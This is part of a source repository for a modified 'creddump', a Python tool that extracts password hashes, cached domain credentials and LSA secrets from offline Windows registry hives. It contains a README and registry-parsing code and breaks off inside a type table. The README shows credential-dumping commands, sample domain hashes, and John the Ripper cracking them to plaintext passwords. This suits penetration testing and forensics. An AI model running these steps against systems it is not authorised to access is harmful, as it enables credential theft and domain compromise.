#Information
|
||||
This repo is for my modifications to the original 'creddump' program available
|
||||
at:
|
||||
|
||||
https://code.google.com/p/creddump/
|
||||
|
||||
I did not write the original program.
|
||||
|
||||
I have combined many patches and fixes I have seen from different forums and
|
||||
user suggestions, as well as modified the usage to make it a little more clear.
|
||||
|
||||
I followed patches and fixes from the following links:
|
||||
|
||||
* https://code.google.com/p/creddump/issues/detail?id=4
|
||||
* https://code.google.com/p/volatility/issues/detail?id=92
|
||||
|
||||
Enjoy!
|
||||
Ronnie Flathers (@ropnop)
|
||||
|
||||
|
||||
###Usage
|
||||
Mount a Windows 7/Vista partition:
|
||||
```
|
||||
# mkdir /mnt/win
|
||||
# ntfs-3g /dev/sda1 /mnt/win
|
||||
```
|
||||
|
||||
Run cachedump.py on the SYSTEM and SECURITY hives to extract cached domain creds:
|
||||
```
|
||||
# ./cachedump.py
|
||||
usage: ./cachedump.py <system hive> <security hive> <Vista/7>
|
||||
|
||||
Example (Windows Vista/7):
|
||||
./cachedump.py /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true
|
||||
|
||||
Example (Windows XP):
|
||||
./cachedump.py /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false
|
||||
|
||||
# ./cachedump.py /mnt/win/Windows/System32/config/SYSTEM /mnt/win/Windows/System32/config/SECURITY true |tee hashes
|
||||
nharpsis:6b29dfa157face3f3d8db489aec5cc12:acme:acme.local
|
||||
god:25bd785b8ff1b7fa3a9b9e069a5e7de7:acme:acme.local
|
||||
```
|
||||
|
||||
If you want to crack the hashes and have a good wordlist, John can be used. The hashes are in the 'mscash2' format:
|
||||
```
|
||||
# john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt hashes
|
||||
Loaded 2 password hashes with 2 different salts (M$ Cache Hash 2 (DCC2) PBKDF2-HMAC-SHA-1 [128/128 SSE2 intrinsics 8x])
|
||||
g0d (god)
|
||||
Welcome1! (nharpsis)
|
||||
```
|
||||
|
||||
We now have the passwords for two domain users. Note: these passwords are really simple and I knew they were in the wordlist I used. Normally if you want to actually bruteforce the passwords, I wouldn't recommend John. Pull the hashes and use a GPU powered cracking box with oclHashcat.
|
||||
|
||||
|
||||
####Below is the original README file
|
||||
|
||||
|
||||
OVERVIEW
|
||||
|
||||
creddump is a python tool to extract various credentials and secrets from
|
||||
Windows registry hives. It currently extracts:
|
||||
* LM and NT hashes (SYSKEY protected)
|
||||
* Cached domain passwords
|
||||
* LSA secrets
|
||||
|
||||
It essentially performs all the functions that bkhive/samdump2,
|
||||
cachedump, and lsadump2 do, but in a platform-independent way.
|
||||
|
||||
It is also the first tool that does all of these things in an offline
|
||||
way (actually, Cain & Abel does, but is not open source and is only
|
||||
available on Windows).
|
||||
|
||||
REQUIREMENTS
|
||||
|
||||
alldump has only been tested on python 2.5. It should work on 2.4 as
|
||||
well, but will likely need modification before it will work on 2.3 or
|
||||
below.
|
||||
|
||||
python-crypto is required for its MD5/DES/RC4 support. To obtain it,
|
||||
see: http://www.amk.ca/python/code/crypto
|
||||
|
||||
For lsadump: system and SECURITY hives
|
||||
For cachedump: system and SECURITY hives
|
||||
For pwdump: system and SAM hives
|
||||
|
||||
USAGE
|
||||
|
||||
Dump cached domain hashes:
|
||||
usage: ./cachedump.py <system hive> <security hive>
|
||||
|
||||
Dump LSA secrets:
|
||||
usage: ./lsadump.py <system hive> <security hive>
|
||||
|
||||
Dump local password hashes:
|
||||
usage: ./pwdump.py <system hive> <SAM hive>
|
||||
|
||||
FEATURES
|
||||
|
||||
* Platform independent operation. The only inputs are the hive files
|
||||
from the system--we don't rely on any Windows functionality at all.
|
||||
* Open-source and (hopefully!) readble implementations of Windows
|
||||
obfuscation algorithms used to protect LSA secrets, cached domain
|
||||
passwords, and
|
||||
* A reasonably forgiving registry file parser in pure Python. Look
|
||||
through framework/types.py and framework/win32/rawreg.py to see how it
|
||||
works.
|
||||
* The first complete open-source implementation of advapi32's
|
||||
SystemFunction005. The version in the Wine source code does not
|
||||
appear to allow for keys longer than 7 bytes, while the Windows
|
||||
version (and this version) does. See decrypt_secret() in
|
||||
framework/win32/lsasecrets.py
|
||||
|
||||
AUTHOR
|
||||
|
||||
creddump is written by Brendan Dolan-Gavitt (bdolangavitt@wesleyan.edu).
|
||||
For more information on Syskey, LSA secrets, cached domain credentials,
|
||||
and lots of information on volatile memory forensics and reverse
|
||||
engineering, check out:
|
||||
|
||||
http://moyix.blogspot.com/
|
||||
|
||||
CREDITS
|
||||
* AAron Walters. Much of the data type parsing code is taken from
|
||||
Volatility, an excellent memory analysis framework written in Python.
|
||||
He's also a really nice guy, and has helped me out a lot in my
|
||||
research.
|
||||
|
||||
https://www.volatilesystems.com/default/volatility
|
||||
|
||||
* Massimiliano Montoro (mao), for reversing the mechanism Windows uses
|
||||
to derive the LSA key so that it can be computed directly from the
|
||||
hive files, as decribed in this post:
|
||||
|
||||
http://oxid.netsons.org/phpBB2/viewtopic.php?t=149
|
||||
http://www.oxid.it/
|
||||
|
||||
* Jeremy Allison, for the details of the obfuscation applied to password
|
||||
hashes in the SAM, as implemented in the original pwdump.
|
||||
|
||||
http://us4.samba.org/samba/ftp/pwdump/
|
||||
|
||||
* Nicola Cuomo, for his excellent description of the syskey mechanism
|
||||
and how it is used to encrypt the SAM in Windows 2000 and above.
|
||||
|
||||
http://www.studenti.unina.it/~ncuomo/syskey/
|
||||
|
||||
* Eyas[at]xfocus.org, for x_dialupass2.cpp, which demonstrates how to
|
||||
read LSA secrets directly from the registry, given the LSA key.
|
||||
|
||||
http://www.xfocus.net/articles/200411/749.html
|
||||
|
||||
[Note: the above is in Chinese, but quite comprehensible if you use
|
||||
Google Translate and can read C ;)]
|
||||
|
||||
* Nicholas Ruff, for his perl implementation of des_set_odd_parity,
|
||||
which he apparently took from SSLEAY:
|
||||
|
||||
http://seclists.org/pen-test/2005/Jan/0180.html
|
||||
|
||||
* Arnaud Pilon, for the details of how to retrieve cached domain, as
|
||||
implemented in cachedump.
|
||||
|
||||
http://www.securiteam.com/tools/5JP0I2KFPA.html
|
||||
|
||||
* S<>bastien Ke, for his cute hexdump recipe:
|
||||
|
||||
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
|
||||
|
||||
LICENSE
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
@ -0,0 +1,44 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
|
||||
import sys
|
||||
from framework.win32.domcachedump import dump_file_hashes
|
||||
def showUsage():
|
||||
print "usage: %s <system hive> <security hive> <Vista/7>" % sys.argv[0]
|
||||
print "\nExample (Windows Vista/7):"
|
||||
print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
|
||||
print "\nExample (Windows XP):"
|
||||
print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]
|
||||
|
||||
if len(sys.argv) < 4:
|
||||
showUsage()
|
||||
sys.exit(1)
|
||||
|
||||
if sys.argv[3] not in ["true", "false"]:
|
||||
showUsage()
|
||||
sys.exit(1)
|
||||
|
||||
vista = True if sys.argv[3] == "true" else False
|
||||
|
||||
dump_file_hashes(sys.argv[1], sys.argv[2], sys.argv[3])
|
|
@ -0,0 +1,141 @@
|
|||
# Volatility
|
||||
# Copyright (C) 2007 Volatile Systems
|
||||
#
|
||||
# Original Source:
|
||||
# Copyright (C) 2004,2005,2006 4tphi Research
|
||||
# Author: {npetroni,awalters}@4tphi.net (Nick Petroni and AAron Walters)
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation; either version 2 of the License, or (at
|
||||
# your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
|
||||
#
|
||||
|
||||
"""
|
||||
@author: AAron Walters
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: awalters@volatilesystems.com
|
||||
@organization: Volatile Systems
|
||||
"""
|
||||
|
||||
""" Alias for all address spaces """
|
||||
|
||||
import os
|
||||
import struct
|
||||
|
||||
class FileAddressSpace:
|
||||
def __init__(self, fname, mode='rb', fast=False):
|
||||
self.fname = fname
|
||||
self.name = fname
|
||||
self.fhandle = open(fname, mode)
|
||||
self.fsize = os.path.getsize(fname)
|
||||
|
||||
if fast == True:
|
||||
self.fast_fhandle = open(fname, mode)
|
||||
|
||||
def fread(self,len):
|
||||
return self.fast_fhandle.read(len)
|
||||
|
||||
def read(self, addr, len):
|
||||
self.fhandle.seek(addr)
|
||||
return self.fhandle.read(len)
|
||||
|
||||
def read_long(self, addr):
|
||||
string = self.read(addr, 4)
|
||||
(longval, ) = struct.unpack('L', string)
|
||||
return longval
|
||||
|
||||
def get_address_range(self):
|
||||
return [0,self.fsize-1]
|
||||
|
||||
def get_available_addresses(self):
|
||||
return [self.get_address_range()]
|
||||
|
||||
def is_valid_address(self, addr):
|
||||
return addr < self.fsize - 1
|
||||
|
||||
def close():
|
||||
self.fhandle.close()
|
||||
|
||||
# Code below written by Brendan Dolan-Gavitt
|
||||
|
||||
BLOCK_SIZE = 0x1000
|
||||
|
||||
class HiveFileAddressSpace:
|
||||
def __init__(self, fname):
|
||||
self.fname = fname
|
||||
self.base = FileAddressSpace(fname)
|
||||
|
||||
def vtop(self, vaddr):
|
||||
return vaddr + BLOCK_SIZE + 4
|
||||
|
||||
def read(self, vaddr, length, zero=False):
|
||||
first_block = BLOCK_SIZE - vaddr % BLOCK_SIZE
|
||||
full_blocks = ((length + (vaddr % BLOCK_SIZE)) / BLOCK_SIZE) - 1
|
||||
left_over = (length + vaddr) % BLOCK_SIZE
|
||||
|
||||
paddr = self.vtop(vaddr)
|
||||
if paddr == None and zero:
|
||||
if length < first_block:
|
||||
return "\0" * length
|
||||
else:
|
||||
stuff_read = "\0" * first_block
|
||||
elif paddr == None:
|
||||
return None
|
||||
else:
|
||||
if length < first_block:
|
||||
stuff_read = self.base.read(paddr, length)
|
||||
if not stuff_read and zero:
|
||||
return "\0" * length
|
||||
else:
|
||||
return stuff_read
|
||||
|
||||
stuff_read = self.base.read(paddr, first_block)
|
||||
if not stuff_read and zero:
|
||||
stuff_read = "\0" * first_block
|
||||
|
||||
new_vaddr = vaddr + first_block
|
||||
for i in range(0,full_blocks):
|
||||
paddr = self.vtop(new_vaddr)
|
||||
if paddr == None and zero:
|
||||
stuff_read = stuff_read + "\0" * BLOCK_SIZE
|
||||
elif paddr == None:
|
||||
return None
|
||||
else:
|
||||
new_stuff = self.base.read(paddr, BLOCK_SIZE)
|
||||
if not new_stuff and zero:
|
||||
new_stuff = "\0" * BLOCK_SIZE
|
||||
elif not new_stuff:
|
||||
return None
|
||||
else:
|
||||
stuff_read = stuff_read + new_stuff
|
||||
new_vaddr = new_vaddr + BLOCK_SIZE
|
||||
|
||||
if left_over > 0:
|
||||
paddr = self.vtop(new_vaddr)
|
||||
if paddr == None and zero:
|
||||
stuff_read = stuff_read + "\0" * left_over
|
||||
elif paddr == None:
|
||||
return None
|
||||
else:
|
||||
stuff_read = stuff_read + self.base.read(paddr, left_over)
|
||||
return stuff_read
|
||||
|
||||
def read_long_phys(self, addr):
|
||||
string = self.base.read(addr, 4)
|
||||
(longval, ) = struct.unpack('L', string)
|
||||
return longval
|
||||
|
||||
def is_valid_address(self, vaddr):
|
||||
paddr = self.vtop(vaddr)
|
||||
if not paddr: return False
|
||||
return self.base.is_valid_address(paddr)
|
|
@ -0,0 +1,301 @@
|
|||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
from object import *
|
||||
from types import regtypes as types
|
||||
from operator import itemgetter
|
||||
from struct import unpack
|
||||
|
||||
def get_ptr_type(structure, member):
|
||||
"""Return the type a pointer points to.
|
||||
|
||||
Arguments:
|
||||
structure : the name of the structure from vtypes
|
||||
member : a list of members
|
||||
|
||||
Example:
|
||||
get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY']
|
||||
"""
|
||||
if len(member) > 1:
|
||||
_, tp = get_obj_offset(types, [structure, member[0]])
|
||||
if tp == 'array':
|
||||
return types[structure][1][member[0]][1][2][1]
|
||||
else:
|
||||
return get_ptr_type(tp, member[1:])
|
||||
else:
|
||||
return types[structure][1][member[0]][1][1]
|
||||
|
||||
class Obj(object):
|
||||
"""Base class for all objects.
|
||||
|
||||
May return a subclass for certain data types to allow
|
||||
for special handling.
|
||||
"""
|
||||
|
||||
def __new__(typ, name, address, space):
|
||||
if name in globals():
|
||||
# This is a bit of "magic"
|
||||
# Could be replaced with a dict mapping type names to types
|
||||
return globals()[name](name,address,space)
|
||||
elif name in builtin_types:
|
||||
return Primitive(name, address, space)
|
||||
else:
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def __init__(self, name, address, space):
|
||||
self.name = name
|
||||
self.address = address
|
||||
self.space = space
|
||||
|
||||
# Subclasses can add fields to this list if they want them
|
||||
# to show up in values() or members(), even if they do not
|
||||
# appear in the vtype definition
|
||||
self.extra_members = []
|
||||
|
||||
def __getattribute__(self, attr):
|
||||
try:
|
||||
return object.__getattribute__(self, attr)
|
||||
except AttributeError:
|
||||
pass
|
||||
|
||||
if self.name in builtin_types:
|
||||
raise AttributeError("Primitive types have no dynamic attributes")
|
||||
|
||||
try:
|
||||
off, tp = get_obj_offset(types, [self.name, attr])
|
||||
except:
|
||||
raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr))
|
||||
|
||||
if tp == 'array':
|
||||
a_len = types[self.name][1][attr][1][1]
|
||||
l = []
|
||||
for i in range(a_len):
|
||||
a_off, a_tp = get_obj_offset(types, [self.name, attr, i])
|
||||
if a_tp == 'pointer':
|
||||
ptp = get_ptr_type(self.name, [attr, i])
|
||||
l.append(Pointer(a_tp, self.address+a_off, self.space, ptp))
|
||||
else:
|
||||
l.append(Obj(a_tp, self.address+a_off, self.space))
|
||||
return l
|
||||
elif tp == 'pointer':
|
||||
# Can't just return a Obj here, since pointers need to also
|
||||
# know what type they point to.
|
||||
ptp = get_ptr_type(self.name, [attr])
|
||||
return Pointer(tp, self.address+off, self.space, ptp)
|
||||
else:
|
||||
return Obj(tp, self.address+off, self.space)
|
||||
|
||||
def __div__(self, other):
|
||||
if isinstance(other,tuple) or isinstance(other,list):
|
||||
return Pointer(other[0], self.address, self.space, other[1])
|
||||
elif isinstance(other,str):
|
||||
return Obj(other, self.address, self.space)
|
||||
else:
|
||||
raise ValueError("Must provide a type name as string for casting")
|
||||
|
||||
def members(self):
|
||||
"""Return a list of this object's members, sorted by offset."""
|
||||
|
||||
# Could also just return the list
|
||||
membs = [ (k, v[0]) for k,v in types[self.name][1].items()]
|
||||
membs.sort(key=itemgetter(1))
|
||||
return map(itemgetter(0),membs) + self.extra_members
|
||||
|
||||
def values(self):
|
||||
"""Return a dictionary of this object's members and their values"""
|
||||
|
||||
valdict = {}
|
||||
for k in self.members():
|
||||
valdict[k] = getattr(self, k)
|
||||
return valdict
|
||||
|
||||
def bytes(self, length=-1):
|
||||
"""Get bytes starting at the address of this object.
|
||||
|
||||
Arguments:
|
||||
length : the number of bytes to read. Default: size of
|
||||
this object.
|
||||
"""
|
||||
|
||||
if length == -1:
|
||||
length = self.size()
|
||||
return self.space.read(self.address, length)
|
||||
|
||||
def size(self):
|
||||
"""Get the size of this object."""
|
||||
|
||||
if self.name in builtin_types:
|
||||
return builtin_types[self.name][0]
|
||||
else:
|
||||
return types[self.name][0]
|
||||
|
||||
def __repr__(self):
|
||||
return "<%s @%08x>" % (self.name, self.address)
|
||||
|
||||
def __eq__(self, other):
|
||||
if not isinstance(other, Obj):
|
||||
raise TypeError("Types are incomparable")
|
||||
return self.address == other.address and self.name == other.name
|
||||
|
||||
def __ne__(self, other):
|
||||
return not self.__eq__(other)
|
||||
|
||||
def __hash__(self):
|
||||
return hash(self.address) ^ hash(self.name)
|
||||
|
||||
def is_valid(self):
|
||||
return self.space.is_valid_address(self.address)
|
||||
|
||||
def get_offset(self, member):
|
||||
return get_obj_offset(types, [self.name] + member)
|
||||
|
||||
class Primitive(Obj):
|
||||
"""Class to represent a primitive data type.
|
||||
|
||||
Attributes:
|
||||
value : the python primitive value of this type
|
||||
"""
|
||||
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def __init__(self, name, address, space):
|
||||
super(Primitive,self).__init__(name, address, space)
|
||||
length, fmt = builtin_types[name]
|
||||
data = space.read(address,length)
|
||||
if not data: self.value = None
|
||||
else: self.value = unpack(fmt,data)[0]
|
||||
|
||||
def __repr__(self):
|
||||
return repr(self.value)
|
||||
|
||||
def members(self):
|
||||
return []
|
||||
|
||||
class Pointer(Obj):
|
||||
"""Class to represent pointers.
|
||||
|
||||
value : the object pointed to
|
||||
|
||||
If an attribute is not found in this instance,
|
||||
the attribute will be looked up in the referenced
|
||||
object."""
|
||||
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def __init__(self, name, address, space, ptr_type):
|
||||
super(Pointer,self).__init__(name, address, space)
|
||||
ptr_address = read_value(space, name, address)
|
||||
if ptr_type[0] == 'pointer':
|
||||
self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1])
|
||||
else:
|
||||
self.value = Obj(ptr_type[0], ptr_address, self.space)
|
||||
|
||||
def __getattribute__(self, attr):
|
||||
# It's still nice to be able to access things through pointers
|
||||
# without having to explicitly dereference them, so if we don't
|
||||
# find an attribute via our superclass, just dereference the pointer
|
||||
# and return the attribute in the pointed-to type.
|
||||
try:
|
||||
return super(Pointer,self).__getattribute__(attr)
|
||||
except AttributeError:
|
||||
return getattr(self.value, attr)
|
||||
|
||||
def __repr__(self):
|
||||
return "<pointer to [%s @%08x]>" % (self.value.name, self.value.address)
|
||||
|
||||
def members(self):
|
||||
return self.value.members()
|
||||
|
||||
class _UNICODE_STRING(Obj):
|
||||
"""Class representing a _UNICODE_STRING
|
||||
|
||||
Adds the following behavior:
|
||||
* The Buffer attribute is presented as a Python string rather
|
||||
than a pointer to an unsigned short.
|
||||
* The __str__ method returns the value of the Buffer.
|
||||
"""
|
||||
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def __str__(self):
|
||||
return self.Buffer
|
||||
|
||||
# Custom Attributes
|
||||
def getBuffer(self):
|
||||
return read_unicode_string(self.space, types, [], self.address)
|
||||
Buffer = property(fget=getBuffer)
|
||||
|
||||
class _CM_KEY_NODE(Obj):
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def getName(self):
|
||||
return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'],
|
||||
self.address, self.NameLength.value)
|
||||
Name = property(fget=getName)
|
||||
|
||||
class _CM_KEY_VALUE(Obj):
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def getName(self):
|
||||
return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'],
|
||||
self.address, self.NameLength.value)
|
||||
Name = property(fget=getName)
|
||||
|
||||
class _CHILD_LIST(Obj):
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def getList(self):
|
||||
lst = []
|
||||
list_address = read_obj(self.space, types,
|
||||
['_CHILD_LIST', 'List'], self.address)
|
||||
for i in range(self.Count.value):
|
||||
lst.append(Pointer("pointer", list_address+(i*4), self.space,
|
||||
["_CM_KEY_VALUE"]))
|
||||
return lst
|
||||
List = property(fget=getList)
|
||||
|
||||
class _CM_KEY_INDEX(Obj):
|
||||
def __new__(typ, *args, **kwargs):
|
||||
obj = object.__new__(typ)
|
||||
return obj
|
||||
|
||||
def getList(self):
|
||||
lst = []
|
||||
for i in range(self.Count.value):
|
||||
# we are ignoring the hash value here
|
||||
off,tp = get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i*2])
|
||||
lst.append(Pointer("pointer", self.address+off, self.space,
|
||||
["_CM_KEY_NODE"]))
|
||||
return lst
|
||||
List = property(fget=getList)
|
|
@ -0,0 +1,171 @@
|
|||
# Volatools Basic
|
||||
# Copyright (C) 2007 Komoku, Inc.
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation; either version 2 of the License, or (at
|
||||
# your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
|
||||
#
|
||||
|
||||
"""
|
||||
@author: AAron Walters and Nick Petroni
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: awalters@komoku.com, npetroni@komoku.com
|
||||
@organization: Komoku, Inc.
|
||||
"""
|
||||
|
||||
import struct
|
||||
|
||||
builtin_types = { \
|
||||
'int' : (4, 'i'), \
|
||||
'long': (4, 'i'), \
|
||||
'unsigned long' : (4, 'I'), \
|
||||
'unsigned int' : (4, 'I'), \
|
||||
'address' : (4, 'I'), \
|
||||
'char' : (1, 'c'), \
|
||||
'unsigned char' : (1, 'B'), \
|
||||
'unsigned short' : (2, 'H'), \
|
||||
'short' : (2, 'h'), \
|
||||
'long long' : (8, 'q'), \
|
||||
'unsigned long long' : (8, 'Q'), \
|
||||
'pointer' : (4, 'I'),\
|
||||
}
|
||||
|
||||
|
||||
def obj_size(types, objname):
|
||||
if not types.has_key(objname):
|
||||
raise Exception('Invalid type %s not in types' % (objname))
|
||||
|
||||
return types[objname][0]
|
||||
|
||||
def builtin_size(builtin):
|
||||
if not builtin_types.has_key(builtin):
|
||||
raise Exception('Invalid built-in type %s' % (builtin))
|
||||
|
||||
return builtin_types[builtin][0]
|
||||
|
||||
def read_value(addr_space, value_type, vaddr):
|
||||
"""
|
||||
Read the low-level value for a built-in type.
|
||||
"""
|
||||
|
||||
if not builtin_types.has_key(value_type):
|
||||
raise Exception('Invalid built-in type %s' % (value_type))
|
||||
|
||||
type_unpack_char = builtin_types[value_type][1]
|
||||
type_size = builtin_types[value_type][0]
|
||||
|
||||
buf = addr_space.read(vaddr, type_size)
|
||||
if buf is None:
|
||||
return None
|
||||
(val, ) = struct.unpack(type_unpack_char, buf)
|
||||
|
||||
return val
|
||||
|
||||
def read_unicode_string(addr_space, types, member_list, vaddr):
|
||||
offset = 0
|
||||
if len(member_list) > 1:
|
||||
(offset, current_type) = get_obj_offset(types, member_list)
|
||||
|
||||
|
||||
buf = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset)
|
||||
length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset)
|
||||
|
||||
if length == 0x0:
|
||||
return ""
|
||||
|
||||
if buf is None or length is None:
|
||||
return None
|
||||
|
||||
readBuf = read_string(addr_space, types, ['char'], buf, length)
|
||||
|
||||
if readBuf is None:
|
||||
return None
|
||||
|
||||
try:
|
||||
readBuf = readBuf.decode('UTF-16').encode('ascii')
|
||||
except:
|
||||
return None
|
||||
|
||||
return readBuf
|
||||
|
||||
def read_string(addr_space, types, member_list, vaddr, max_length=256):
|
||||
offset = 0
|
||||
if len(member_list) > 1:
|
||||
(offset, current_type) = get_obj_offset(types, member_list)
|
||||
|
||||
val = addr_space.read(vaddr + offset, max_length)
|
||||
|
||||
return val
|
||||
|
||||
|
||||
def read_null_string(addr_space, types, member_list, vaddr, max_length=256):
|
||||
string = read_string(addr_space, types, member_list, vaddr, max_length)
|
||||
|
||||
if string is None:
|
||||
return None
|
||||
|
||||
if (string.find('\0') == -1):
|
||||
return string
|
||||
(string, none) = string.split('\0', 1)
|
||||
return string
|
||||
|
||||
|
||||
def get_obj_offset(types, member_list):
|
||||
"""
|
||||
Returns the (offset, type) pair for a given list
|
||||
"""
|
||||
member_list.reverse()
|
||||
|
||||
current_type = member_list.pop()
|
||||
|
||||
offset = 0
|
||||
|
||||
while (len(member_list) > 0):
|
||||
if current_type == 'array':
|
||||
current_type = member_dict[current_member][1][2][0]
|
||||
if current_type in builtin_types:
|
||||
current_type_size = builtin_size(current_type)
|
||||
else:
|
||||
current_type_size = obj_size(types, current_type)
|
||||
index = member_list.pop()
|
||||
offset += index * current_type_size
|
||||
continue
|
||||
|
||||
elif not types.has_key(current_type):
|
||||
raise Exception('Invalid type ' + current_type)
|
||||
|
||||
member_dict = types[current_type][1]
|
||||
|
||||
current_member = member_list.pop()
|
||||
if not member_dict.has_key(current_member):
|
||||
raise Exception('Invalid member %s in type %s' % (current_member, current_type))
|
||||
|
||||
offset += member_dict[current_member][0]
|
||||
|
||||
current_type = member_dict[current_member][1][0]
|
||||
|
||||
return (offset, current_type)
|
||||
|
||||
|
||||
def read_obj(addr_space, types, member_list, vaddr):
|
||||
"""
|
||||
Read the low-level value for some complex type's member.
|
||||
The type must have members.
|
||||
"""
|
||||
if len(member_list) < 2:
|
||||
raise Exception('Invalid type/member ' + str(member_list))
|
||||
|
||||
|
||||
|
||||
(offset, current_type) = get_obj_offset(types, member_list)
|
||||
return read_value(addr_space, current_type, vaddr + offset)
|
|
@ -0,0 +1,63 @@
|
|||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
regtypes = {
|
||||
'_CM_KEY_VALUE' : [ 0x18, {
|
||||
'Signature' : [ 0x0, ['unsigned short']],
|
||||
'NameLength' : [ 0x2, ['unsigned short']],
|
||||
'DataLength' : [ 0x4, ['unsigned long']],
|
||||
'Data' : [ 0x8, ['unsigned long']],
|
||||
'Type' : [ 0xc, ['unsigned long']],
|
||||
'Flags' : [ 0x10, ['unsigned short']],
|
||||
'Spare' : [ 0x12, ['unsigned short']],
|
||||
'Name' : [ 0x14, ['array', 1, ['unsigned short']]],
|
||||
} ],
|
||||
'_CM_KEY_NODE' : [ 0x50, {
|
||||
'Signature' : [ 0x0, ['unsigned short']],
|
||||
'Flags' : [ 0x2, ['unsigned short']],
|
||||
'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']],
|
||||
'Spare' : [ 0xc, ['unsigned long']],
|
||||
'Parent' : [ 0x10, ['unsigned long']],
|
||||
'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]],
|
||||
